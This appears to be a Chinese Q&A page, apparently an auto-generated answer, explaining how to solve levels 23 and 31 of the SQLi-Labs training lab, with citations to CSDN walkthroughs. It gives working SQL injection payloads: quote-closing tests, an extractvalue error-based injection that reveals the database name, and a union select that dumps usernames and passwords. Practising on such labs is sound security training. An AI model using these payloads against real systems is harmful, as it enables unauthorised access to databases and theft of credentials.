sqlilabs23
时间: 2023-09-07 07:13:56 浏览: 157
2020-10-23-sqli-labs.md
回答: 在SQLi-Labs的第23关中,可以使用闭合注入来进行攻击。可以尝试以下两个payload进行测试:http://192.168.2.60/sqli-labs/Less-23?id=1'# 和http://192.168.2.60/sqli-labs/Less-23?id=1'--+. \[1\]此外,还可以使用报错注入来简化攻击过程,以下是一个用于爆破数据库名的payload示例:http://192.168.2.60/sqli-labs/Less-23?id=-1' and extractvalue(null,concat(0x7e,(database()),0x7e)) and '1'='1. \[2\]如果你想在第31关中获取用户名和密码,可以使用以下payload:http://localhost/sqli-labs/Less-31/?id=1&id=-2)" union select 1,2,(select group_concat(username,’-’,password) from users)–+. \[3\]希望这些信息对你有帮助。
#### 引用[.reference_title]
- *1* *2* [sqli-labs(23)](https://blog.csdn.net/mmzkyl/article/details/113406384)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
- *3* [sqli-labs--23-37关通关指南(详细)](https://blog.csdn.net/weixin_44576725/article/details/121318752)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]
阅读全文